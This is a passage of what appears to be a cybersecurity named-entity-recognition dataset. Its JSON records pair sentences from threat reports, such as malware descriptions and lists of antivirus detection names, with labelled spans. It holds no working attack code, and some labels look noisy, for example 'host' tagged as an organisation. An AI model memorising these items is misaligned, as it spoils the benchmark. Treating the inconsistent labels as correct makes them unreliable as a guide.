"cyner2_valid"}} {"text": "A few days later they can cancel the trial and do not need to pay a penny .", "spans": {}, 
"info": {"id": "cyner2_valid_001102", "source": "cyner2_valid"}} {"text": "When this shortcut file is opened, the host will be infected with malware called Asruex", "spans": {"Organization: host": [[39, 43]], "Malware: malware": [[66, 73]], "Malware: Asruex": [[81, 87]]}, "info": {"id": "cyner2_valid_001103", "source": "cyner2_valid"}} {"text": "It disguises itself as an anti-virus product, and attempts to encourage users into purchasing a non-existent protection.", "spans": {}, "info": {"id": "cyner2_valid_001104", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TROJ64_COINMINER.SMB Trojan.BtcMine.1165 BehavesLike.Win64.Ramnit.hh Trojan.Win64.CoinMiner TrojanDropper:Win32/Dapato.M!bit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001105", "source": "cyner2_valid"}} {"text": "This malware is not a ransomware and is not a bitcoin miner either as others have reported.", "spans": {"Malware: malware": [[5, 12]], "Malware: ransomware": [[22, 32]], "Malware: a bitcoin miner": [[44, 59]]}, "info": {"id": "cyner2_valid_001106", "source": "cyner2_valid"}} {"text": "Proofpoint researchers have uncovered that the threat actor commonly referred to as FIN7 has added a new JScript backdoor called Bateleur and updated macros to its toolkit.", "spans": {"Organization: Proofpoint researchers": [[0, 22]], "Malware: a new JScript backdoor": [[99, 121]], "Malware: Bateleur": [[129, 137]], "Malware: macros": [[150, 156]], "Malware: toolkit.": [[164, 172]]}, "info": {"id": "cyner2_valid_001107", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9883 W32/Pws.ALMI Win.Spyware.42247-1 BehavesLike.Win32.Ransomware.dc W32/PWS.PONN-0793 W32.Malware.Downloader", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001109", "source": "cyner2_valid"}} {"text": "The attackers modified a few lines of code, recompiled the program, and disbursed the trojanized version on compromised web 
servers.", "spans": {"Malware: trojanized version": [[86, 104]]}, "info": {"id": "cyner2_valid_001110", "source": "cyner2_valid"}} {"text": "All of these methods attempt to space out the introduction of possible signals in various stages , testing for gaps in the publication process .", "spans": {}, "info": {"id": "cyner2_valid_001111", "source": "cyner2_valid"}} {"text": "One of the latest ransomware variants is called TeslaCrypt and appears to be a derivative of the original Cryptolocker ransomware.", "spans": {"Malware: ransomware": [[18, 28]], "Malware: TeslaCrypt": [[48, 58]], "Malware: Cryptolocker ransomware.": [[106, 130]]}, "info": {"id": "cyner2_valid_001112", "source": "cyner2_valid"}} {"text": "So I don ’ t know what kind of files will be executed , but they could be malicious or advertising files .", "spans": {}, "info": {"id": "cyner2_valid_001113", "source": "cyner2_valid"}} {"text": "This threat group has been around for quite a while, and commonly operated tangentially to APT1 intrusions into defense contractors and aerospace companies.", "spans": {"Organization: defense contractors": [[112, 131]], "Organization: aerospace companies.": [[136, 156]]}, "info": {"id": "cyner2_valid_001115", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojandownloader.Pogolcil Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Kryptik.ewytqt Trojan.Win32.Z.Kryptik.208896.OT TR/Crypt.ZPACK.bggbz TrojanDownloader:Win32/Pogolcil.E!bit Trojan.Win32.Crypt Trj/GdSda.A Win32/Trojan.5c0", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001117", "source": "cyner2_valid"}} {"text": "The new variant caught our attention because it ’ s an advanced malware with unmistakable malicious characteristic and behavior and yet manages to evade many available protections , registering a low detection rate against security solutions .", "spans": {}, "info": {"id": "cyner2_valid_001119", "source": "cyner2_valid"}} {"text": "Technical and 
temporal analysis of the campaign supports these statements and indicates a direct correlation between the cyber attacks and the ongoing war, highlighting an alarming blend between cyber espionage, physical warfare, and the driving political forces behind them.", "spans": {}, "info": {"id": "cyner2_valid_001120", "source": "cyner2_valid"}} {"text": "The attacks use multiple exploits in an attempt to gain root access on a device .", "spans": {}, "info": {"id": "cyner2_valid_001121", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan-Dropper/W32.Dapato.642320 Trojan-Dropper.Win32.Dapato!O Trojan/Dropper.Dapato.bkcv BKDR_XTRAT.LTY BKDR_XTRAT.LTY Trojan.Win32.Trojan-Dropper.ychad Dropper.Dapato.Win32.29248 W32/Trojan.AOFQ-7014 TrojanDropper.Dapato.ijj TR/Drop.Dapato.bkcv Trojan:Win32/Skymper.A TrojanDropper.Dapato Trj/CI.A Win32/Poison.NLN Win32.Trojan.Falsesign.Gbv Trojan-Dropper.Win32.Dapato W32/Dapato.BKCV!tr Win32/Trojan.0cc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001122", "source": "cyner2_valid"}} {"text": "Just in time for the holidays, a brand new Point Of Sale POS malware family has been discovered.", "spans": {"Malware: Point Of Sale POS malware family": [[43, 75]]}, "info": {"id": "cyner2_valid_001123", "source": "cyner2_valid"}} {"text": "Accessing the same malicious site would redirect its user to another malicious website ( hxxp : //apple-icloud [ .", "spans": {}, "info": {"id": "cyner2_valid_001124", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Arcdoor.te Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.MLW.cxmnch Trojan.DownLoader4.56100 Worm.MSIL.gb Worm/MSIL.Arcdoor Trojan:MSIL/Stooten.A Worm/Win32.Arcdoor.C80706 Worm.MSIL.Arcdoor", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001125", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Cheater.32256 W32.Sharmovo.A8 Trojan/Remtasu.a Win32.Trojan.Delf.q 
Win32/Tnega.VIIYB TROJ_ENEG.SMUM2 Trojan.Win32.KillFiles.cqjidr W32.Lamer.lymQ TrojWare.Win32.Delf.edn Trojan.KillFiles.11968 TROJ_ENEG.SMUM2 BehavesLike.Win32.HLLP.nh Trojan/Resetter.e TR/Resetter.agah Trojan/Win32.Resetter Trojan.Heur.ED60A7 Trojan:Win32/Sharmovo.A Trojan/Win32.Resetter.R19869 Trojan.Resetter Trojan.Win32.Spy W32/Delf.BSE!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001126", "source": "cyner2_valid"}} {"text": "Check Point researchers have conducted a thorough investigation of the DiamondFox malware-as-a-service in collaboration with TerbiumLabs, a Dark Web Data Intelligence company.", "spans": {"Organization: Check Point researchers": [[0, 23]], "Malware: DiamondFox malware-as-a-service": [[71, 102]], "Organization: TerbiumLabs, a Dark Web Data Intelligence company.": [[125, 175]]}, "info": {"id": "cyner2_valid_001127", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojanspy.Klogger Troj.Spy.W32.Klogger.tn9g Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.PPFF-1848 Hacktool.Keylogger Win.Spyware.1752-2 Trojan-Spy.Win32.Klogger Trojan.Win32.Klog.dkjqot Trojan.Win32.A.Klogger.23552 Trojan.Klog.32786 BehavesLike.Win32.Sdbot.mm Win32.Outbreak TrojanDropper.Injector.aabu Trojan[Spy]/Win32.Klogger Trojan-Spy.Win32.Klogger Trojan/Win32.Swrort.C200048 TrojanSpy.Klogger Trj/Keylog.ES Win32/Spy.Klogger Win32.Trojan-spy.Klogger.Pbfr Win32/Trojan.54e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001128", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Powershell Win32.Trojan.WisdomEyes.16070401.9500.9609 Trojan.Win32.Z.Psdl.370688 Troj.W32.SchoolGirl.tnx1 Downloader.Betload.Win32.51 BehavesLike.Win32.Downloader.ft SCRIPT.PowerShell", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001129", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Backdoor.Trojan 
BehavesLike.Win32.RansomTescrypt.jc TrojanDownloader:Win32/Macup.A Trj/CI.A Win32/Trojan.b9d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001130", "source": "cyner2_valid"}} {"text": "] com on port 22011 .", "spans": {}, "info": {"id": "cyner2_valid_001131", "source": "cyner2_valid"}} {"text": "Distracted users mistyping the first n when accessing www.santanderempresarial.com.br are subject to banking credentials theft and a very convincing phone call from a pretended Santander's attendant.", "spans": {"Organization: users": [[11, 16]], "Organization: a pretended Santander's attendant.": [[165, 199]]}, "info": {"id": "cyner2_valid_001132", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.NumberNameHB.Fam.Worm Trojan.HideExec Troj.Clicker.W32.VB.lhyE not-a-virus:RiskTool.Win32.HideExec.r Riskware.Win32.HideExec.ewkvlv Trojan.Win32.Z.Spy.171696 Program.HiddenStart TR/Spy.CoinBit.VY Win32.Troj.Miner.i.kcloud TrojanDropper:Win32/MineBicoin.A not-a-virus:RiskTool.Win32.HideExec.r Trojan.Dropper Win32/Trojan.863", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001133", "source": "cyner2_valid"}} {"text": "] com Backend server spy [ .", "spans": {}, "info": {"id": "cyner2_valid_001134", "source": "cyner2_valid"}} {"text": "The following month , we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples .", "spans": {}, "info": {"id": "cyner2_valid_001137", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win.Trojan.MSShellcode-7 HEUR_PDFEXP.F", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001139", "source": "cyner2_valid"}} {"text": "Anubis can completely hijack an Android mobile device , steal data , record phone calls , and even hold the device to ransom by encrypting the victim ’ s personal files .", "spans": {"Malware: Anubis": [[0, 
6]], "System: Android": [[32, 39]]}, "info": {"id": "cyner2_valid_001140", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.HfsReno.B3AA Trojan.Win32.Crypted.csnsgk Trojan.Rodricter.69 BehavesLike.Win32.PUPXAX.ch Trojan.Razy.D3CCDD Trojan:Win32/Claretore.L", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001141", "source": "cyner2_valid"}} {"text": "We believe this activity, which dates back to at least July 2017, was intended to target travelers to hotels throughout Europe and the Middle East.", "spans": {"Organization: travelers": [[89, 98]]}, "info": {"id": "cyner2_valid_001142", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.TakesoftC.Trojan Trojan/W32.Starter.49160.B Trojan.Win32.Starter!O Trojan.Kplo.S12777 Trojan/Starter.tt TSPY_STARTER_CD100003.RDXN Win32.Trojan.FakeMicro.d W32/Backdoor.HEKM-3098 W32.Ramnit.B Win32/Gamepass.PPO TSPY_STARTER_CD100003.RDXN Trojan.Win32.Starter.bwelm Trojan.Win32.Starter.65536.D Trojan.Starter.1551 Trojan.Starter.Win32.250 W32/Backdoor2.HIFX Trojan/Starter.fb TR/Starter.TT Trojan/Win32.Starter Trojan:Win32/Kplo.B Trojan/Win32.Starter.R1734 Trojan.Starter Trojan.Win32.FakeLpk.a Trojan.Starter!IXSYvr7pvbg Trojan.Win32.Starter", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001143", "source": "cyner2_valid"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.489 O97.Madeba.3874 VBA.Trojan.obfuscated.b VB:Trojan.Valyria.489 VB:Trojan.Valyria.489 Vb.Troj.Valyria!c VB:Trojan.Valyria.489 VB:Trojan.Valyria.489 VB:Trojan.Valyria.489 VB:Trojan.Valyria.489 Trojan.VB.Valyria Win32/Trojan.daf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001144", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojandownloader.Nekozillot Trojan.MSILPerseus.D21311 Trojan.Win32.MSILPerseus.exesfy TrojanDownloader:MSIL/Nekozillot.A!bit Trj/GdSda.A Win32/Trojan.2a8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_valid_001145", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.ForeverXA.Worm Trojan.Win32.Swisyn!O Trojan.Swisyn.Win32.22804 Trojan/Swisyn.bwfd Trojan.Razy.D162A Win32.Trojan.VB.kc W32.Gosys TROJ_SWISYN.SCX Win.Trojan.Kazy-1164 Trojan.Win32.Swisyn.bwfd Trojan.Win32.Swisyn.crsvjc Troj.W32.Swisyn.mzNn Trojan.MulDrop7.40720 BehavesLike.Win32.Swisyn.dm Trojan.Win32.VB Trojan/Swisyn.wjs Trojan.Win32.Vb Trojan.Win32.Swisyn.bwfd Trojan/Win32.Swisyn.R1452 MAS.Trojan.VB.01049 Win32.Trojan.Swisyn.Wsty W32/Swisyn.BNER!tr Win32/Trojan.d47", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001146", "source": "cyner2_valid"}} {"text": "The third type of information will be sent when RuMMS intercepts any SMS messages , including the balance inquiry results when it contacts the SMS code of a particular financial service .", "spans": {"Malware: RuMMS": [[48, 53]]}, "info": {"id": "cyner2_valid_001147", "source": "cyner2_valid"}} {"text": "2016 We do not know exactly how many people have been infected with RuMMS malware ; however , our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016 .", "spans": {"Malware: RuMMS": [[68, 73], [158, 163]]}, "info": {"id": "cyner2_valid_001148", "source": "cyner2_valid"}} {"text": "This is a good example where two-factor authentication based on SMS would fail since the attacker can read the SMS .", "spans": {}, "info": {"id": "cyner2_valid_001149", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.BAT.Favadd!O Trojandropper.Favorcopy Trojan.BAT.Favadd.b Trojan.Win32.Qhost.cyikun BAT.S.Favadd.68096 Troj.BAT.Favadd.b!c Trojan.Win32.Favadd.a Worm.Win32.Autorun.dy02 Trojan.Favadd.201 W32/Trojan.UKLP-3332 Trojan/BAT.ax TrojanDropper:Win32/Favorcopy.A Trojan.BAT.Favadd.b Trojan/Win32.Favadd.R41157 Trojan.BAT.Favadd Trj/CI.A Win32/Trojan.ab8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001150", 
"source": "cyner2_valid"}} {"text": "This is an area where virus writers are actively working , resulting in a large number of technological innovations .", "spans": {}, "info": {"id": "cyner2_valid_001151", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Small!O TjnDownldr.Tibs.S12839 Trojan.Dropper/Packed Win32.Trojan.WisdomEyes.16070401.9500.9984 TROJ_DLOADER.XJ Trojan-Downloader.Win32.Small.bon Trojan.Win32.Small.bpavrf Packer.W32.Tibs.l4Hz Trojan.DownLoader.2489 TROJ_DLOADER.XJ BehavesLike.Win32.Downloader.xc TrojanDownloader.Vxgame.q TrojanDownloader:Win32/Multi.B Trojan.Win32.A.Downloader.4605[FSG] Trojan-Downloader.Win32.Small.bon Trojan/Win32.Downloader.R38972 Trojan-Downloader.Revelation.Tibs.B RiskWare.Tool.CK Trojan-Downloader.Win32.Tibs", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001153", "source": "cyner2_valid"}} {"text": "The other iOS app “ Concipit Shop ” from the same developer appeared normal and was last updated on November 2019 .", "spans": {"System: iOS": [[10, 13]]}, "info": {"id": "cyner2_valid_001154", "source": "cyner2_valid"}} {"text": "On August 25, 2016, the Citizen Lab published a report showing that NSO's technology was used to target Ahmed Mansoor, a UAE-based human rights defender, as well as identifying targeting in Mexico.", "spans": {"Organization: the Citizen Lab": [[20, 35]], "Organization: Ahmed Mansoor,": [[104, 118]], "Organization: UAE-based human rights defender,": [[121, 153]]}, "info": {"id": "cyner2_valid_001155", "source": "cyner2_valid"}} {"text": "Coming back to the execution flow , once the spyware hides itself , it starts an Android service named MainService .", "spans": {"System: Android": [[81, 88]]}, "info": {"id": "cyner2_valid_001157", "source": "cyner2_valid"}} {"text": "Users looking forward to using the TikTok app amidst the ban might look for alternative methods to download the app .", "spans": {"System: TikTok": [[35, 41]]}, "info": 
{"id": "cyner2_valid_001158", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Adware.SMSHoax.Win32.45 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.Inject.aiecb Trojan.Win32.Inject.evxrvf Hoax.W32.ArchSMS.mB2T Trojan.DownLoad3.49527 BehavesLike.Win32.BadFile.wm Trojan.Inject.adde Trojan:Win32/Zonsterarch.BW Adware.SMSHoax.6 Trojan.Win32.Inject.aiecb PUP/Win32.InstMonster.R215348 Adware.InstallMonster Trojan.Inject!lYnrTmkmtHE AdWare.InstMonster", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001159", "source": "cyner2_valid"}} {"text": "It tries to steal victims' banking credentials and credit card information via phishing pages crafted to mimic Google Play's payment interface as well as the login pages of 7 different banks' apps.", "spans": {"System: Google Play's payment interface": [[111, 142]]}, "info": {"id": "cyner2_valid_001160", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.DownloadRecslurpG.Trojan TrojanDownloader.Recslurp Trojan.MalPack BKDR_MATSNU.SM0 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.SEQE-1842 BKDR_MATSNU.SM0 Trojan.Win32.Recslurp.dsjyyo Trojan.Win32.Z.Recslurp.73728 Trojan.Proxy.27552 Trojan.Recslurp.Win32.1 BehavesLike.Win32.Madangel.lh W32/Trojan2.OUIQ Trojan/Recslurp.b TR/Crypt.ZPACK.kabym TrojanDownloader:Win32/Recslurp.E Trojan/Win32.Inject.R151698 Trojan.Recslurp Trj/CI.A W32/Kryptik.DZVG!tr Win32/Trojan.980", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001162", "source": "cyner2_valid"}} {"text": "Ginning the ratings FURTHER READING 1 million Google accounts compromised by Android malware called Gooligan To implement the VM feature , the malicious APK installation dropper used by HummingWhale uses DroidPlugin , an extension originally developed by developers from China-based company Qihoo 360 , Check Point said .", "spans": {"Organization: Google": [[46, 52]], "System: Android": [[77, 84]], "Malware: Gooligan": [[100, 108]], 
"Malware: HummingWhale": [[186, 198]], "Malware: DroidPlugin": [[204, 215]], "Organization: Qihoo 360": [[291, 300]], "Organization: Check Point": [[303, 314]]}, "info": {"id": "cyner2_valid_001163", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.FakeAlert Win32.Trojan.WisdomEyes.16070401.9500.9800 W32/Trojan.HIMV-8652 Troj.W32.Inject.tnKf BehavesLike.Win32.Downloader.lh Trojan.HTML.FakeAlert TrojanDownloader.Paph.ds TR/AD.Bosoda.mysge Trojan[Downloader]/Win32.Betload Trojan.Jaiko.D1041 Joke:BAT/Bosoda.A Trojan.FakeAlert Trj/CI.A HTML/FakeAlert.AF Win32.Trojan.Crypt.Wptb", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001164", "source": "cyner2_valid"}} {"text": "On May 6 and May 11, 2015, Unit 42 observed two targeted attacks, the first against the U.S. government and the second on a European media company.", "spans": {"Organization: Unit 42": [[27, 34]], "Organization: U.S. government": [[88, 103]], "Organization: European media company.": [[124, 147]]}, "info": {"id": "cyner2_valid_001165", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.ActogarLTAI.Trojan Trojan.Zbot Trojan.IRCBot.Win32.7789 Trojan/AutoRun.IRCBot.jd Win32.Trojan.WisdomEyes.16070401.9500.9987 W32.IRCBot TROJ_HPCRYPCTB.SMR Trojan.Win32.Androm.dyglia TROJ_HPCRYPCTB.SMR BehavesLike.Win32.PWSZbot.dc W32/Trojan.JJZL-1655 Trojan.Blocker.wv TR/Crypt.ZPACK.utcuw Trojan[Downloader]/Win32.Dofoil Trojan.Zbot.191 Trojan/Win32.Miuref.R167036 Trojan.Diple Win32/AutoRun.IRCBot.JD Trojan.IRCbot!qGVCqAdzAoo Trojan.Win32.Boaxxe W32/Injector.CLNV!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001166", "source": "cyner2_valid"}} {"text": "Overall in 2012-2013 we detected approximately 10,000,000 unique malicious installation packages : Different installation packages can install programs with the same functionality that differ only in terms of the malicious app interface and , for instance , the content of the text 
messages it spreads .", "spans": {}, "info": {"id": "cyner2_valid_001167", "source": "cyner2_valid"}} {"text": "Trend Micro presents a case study of the cyberespionage efforts by Earth Preta.", "spans": {"Organization: Trend Micro": [[0, 11]]}, "info": {"id": "cyner2_valid_001168", "source": "cyner2_valid"}} {"text": "We have collected numerous samples spanning from 2016 to early 2019 .", "spans": {}, "info": {"id": "cyner2_valid_001169", "source": "cyner2_valid"}} {"text": "One of the hardest things to do when you are receiving malware that have anonymized e.g. name-is-hash names or general samples that lack any indication of the infection vector is to determine the origin of the file and its intended target.", "spans": {}, "info": {"id": "cyner2_valid_001171", "source": "cyner2_valid"}} {"text": "It also attempts to spread using the EternalBlue and EternalRomance SMBv1 exploits.", "spans": {"Malware: EternalBlue": [[37, 48]], "Malware: EternalRomance SMBv1 exploits.": [[53, 83]]}, "info": {"id": "cyner2_valid_001172", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.HackTool.7168.D Trojan/Hacktool.Xhack.01.b Win32/HackTool.XHack.01.B TROJ_XHACK.B HackTool.Win32.Xhack.01.b Riskware.Win32.Xhack-01.unxw HackTool.Xhack.7168[h] TrojWare.Win32.HackTool.XHack.B Tool.Xhack Tool.Xhack.Win32.2 TROJ_XHACK.B BehavesLike.Win32.TibsPacked.zc W32/Tool.WANC-2640 Hacktool.XHack.01.b SPR/xHack.01.B HackTool/Win32.Xhack HackTool.W32.Xhack.01.b!c Win-Trojan/Xhack.7168 HackTool:Win32/Xhack.B Win32.Hacktool.Xhack.Akyz HackTool.Win32.Xhack HackTool.ACAG Hacktool.Win32.Xhack.01 Win32/Trojan.Hacktool.cc1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001173", "source": "cyner2_valid"}} {"text": "A backdoor targeting Linux also known as: Backdoor.Linux.Mirai.B Backdoor.LuaBot.Linux.11 Backdoor.Linux.Luabot!c Linux.Iotreaper Linux/Iotreaper.A ELF_IOTREAPER.A Unix.Trojan.IoTReaper-6355327-0 HEUR:Backdoor.Linux.LuaBot.b 
Trojan.LuaBot.eulikp Linux.IotReaper.10 ELF_IOTREAPER.A ELF/Trojan.CQZK-6 Backdoor.Linux.aeup LINUX/Luabot.lvmpq Linux/Luabot.A!tr.bdr Trojan[Backdoor]/Linux.LuaBot.b Linux.S.Reaper.862672 HEUR:Backdoor.Linux.LuaBot.b Linux/Luabot.862672 Trojan.Linux.IotReaper Linux.Backdoor.Luabot.Taoo Trojan.Linux.Iotreaper", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001174", "source": "cyner2_valid"}} {"text": "The attack four years ago resulted in 30,000 or more systems being damaged.", "spans": {"System: systems": [[53, 60]]}, "info": {"id": "cyner2_valid_001175", "source": "cyner2_valid"}} {"text": "Compared to other ransomware such as Cerber, whose developers earn 40% in commissions, Encryptor RaaS has a more attractive proposition.", "spans": {"Malware: ransomware": [[18, 28]], "Malware: Cerber,": [[37, 44]], "Malware: Encryptor RaaS": [[87, 101]]}, "info": {"id": "cyner2_valid_001176", "source": "cyner2_valid"}} {"text": "We believe this to be the largest known Apple account theft caused by malware.", "spans": {"System: Apple account": [[40, 53]], "Malware: malware.": [[70, 78]]}, "info": {"id": "cyner2_valid_001177", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Worm.Socks.A Worm.Win32.Socks!O Win32.Worm.Socks.A Worm.Socks.Win32.466 W32/Socks.at Win32.Worm.Socks.A WORM_SOCKS.DZ Win32.Trojan-Downloader.Small.g W32/Worm.XEH W32.Mandaph Win32/Ruternam.DD WORM_SOCKS.DZ Win.Worm.Socks-22 SScope.Worm.Socks.afv Worm.Win32.Socks.at Trojan.Win32.Socks.bgabja Worm.Win32.A.Socks.77757 W32.W.Socks.l03A Win32.Worm.Socks.A Trojan.DownLoader8.12758 BehavesLike.Win32.VirRansom.cc W32/Worm.CUZR-8725 TrojanDownloader.Small.sui Worm/Win32.Socks Worm:Win32/Figload.A Win32.Worm.Socks.A Worm.Socks Worm.Win32.Socks.at Win32.Worm.Socks.A Worm/Win32.Socks.R51740 W32/Socks.a Win32.Worm.Socks.A Win32/TrojanDownloader.Small.OBD Worm.Socks!5J3YF194TfI W32/PackZbot.AFG!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_valid_001178", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Dropped:Trojan.Dropper.TTW TrojanDropper.Crenufs.AA3 TROJ_DROPPR.SMAB Win32/Dropper.KI TROJ_DROPPR.SMAB Win.Trojan.Dropper-4236 Dropped:Trojan.Dropper.TTW Trojan.Win32.Drop.bsjju Dropped:Trojan.Dropper.TTW Backdoor.Win32.Poison.HMN Trojan.DownLoader3.58740 BehavesLike.Win32.RAHack.ch TrojanDropper.StartPage.kf TrojanDropper:Win32/Crenufs.A Trojan.Dropper.TTW Dropper.StartPage.151552 Dropped:Trojan.Dropper.TTW Dropper/Win32.StartPage.R7795 Dropped:Trojan.Dropper.TTW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001179", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Worm.Kolab.BX Worm/W32.Kolab.196608.Z Worm.Krap Trojan/AutoRun.IRCBot.gq TROJ_INJECT.JIL Win32.Virus.Krap.a W32/Trojan2.NSDN Win32/Tnega.ALDW TROJ_INJECT.JIL Win.Trojan.Zbot-44769 Win32.Worm.Kolab.BX Virus.Win32.Krap.it Win32.Worm.Kolab.BX Trojan.Win32.SmsSend.cbobaq Worm.Win32.A.Net-Kolab.196608.H Virus.W32.Krap!c Win32.Worm.Kolab.BX ApplicUnwnt.Win32.Hoax.ArchSMS.SG Win32.Worm.Kolab.BX Trojan.PWS.Panda.547 Worm.Kolab.Win32.11974 BehavesLike.Win32.ZBot.ch W32/Trojan.VOEZ-7948 TrojanDropper.Daws.aeg W32.Infostealer.Zeus WORM/IrcBot.ED Win32.Worm.Kolab.BX Virus.Win32.Krap.it Trojan:Win32/Kanots.A Trojan/Win32.Zbot.R22644 BScope.Hoax.ArchSMS.2231 Trj/Pacrypt.D Trojan.Kolab Win32/AutoRun.IRCBot.GQ Worm.AutoRun!j45RyJLdJEk W32/Zbot.EQPB!tr Win32/Worm.ab1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001180", "source": "cyner2_valid"}} {"text": "I previously associated Adwind with targeted phishing attempts in limited amounts.", "spans": {"Malware: Adwind": [[24, 30]]}, "info": {"id": "cyner2_valid_001181", "source": "cyner2_valid"}} {"text": "Add to this a ransom of 1.79 Bitcoins approximately $3,300 at the time of the campaign and the potential value of the campaign is significant.", "spans": {}, "info": {"id": "cyner2_valid_001182", "source": 
"cyner2_valid"}} {"text": "MainService is the central controller of this spyware .", "spans": {}, "info": {"id": "cyner2_valid_001184", "source": "cyner2_valid"}} {"text": "State Machines Since various carriers implement the billing process differently , Bread has developed several variants containing generalized state machines implementing all possible steps .", "spans": {"Malware: Bread": [[82, 87]]}, "info": {"id": "cyner2_valid_001185", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.DownLoad3.15790 Trojan-Downloader.Win32.Injecter", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001186", "source": "cyner2_valid"}} {"text": "Sending C2-specified SMS messages to phone numbers in the victim ’ s contacts .", "spans": {}, "info": {"id": "cyner2_valid_001188", "source": "cyner2_valid"}} {"text": "Observe and look at the app ’ s display and text , stated functions , reviews from other users , and requested permissions before downloading .", "spans": {}, "info": {"id": "cyner2_valid_001189", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W97M.Downloader.BRA O97M.Dropper.XA W97M/Downloader.bbl W97M.Downloader.BRA W2KM_DRIDEX.YYSUN W97M.Downloader.BRA W97M.Downloader.BRA W97M.DownLoader.990 W2KM_DRIDEX.YYSUN W97M/Downloader.bbl HEUR.VBA.Trojan.e TrojanDropper:O97M/Vibro.A W97M.Downloader.BRA W97M.Downloader.BRA virus.office.obfuscated.4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001190", "source": "cyner2_valid"}} {"text": "On January 25, 2017, the criminal syndicate behind Dridex launched another small campaign targeting UK financial institutions.", "spans": {"Malware: Dridex": [[51, 57]], "Organization: financial institutions.": [[103, 126]]}, "info": {"id": "cyner2_valid_001191", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.GameHack BehavesLike.Win32.BadFile.mz Trojan.Win32.GameHack Trojan:Win32/GameHack.C", "spans": {"Malware: backdoor": [[2, 10]]}, 
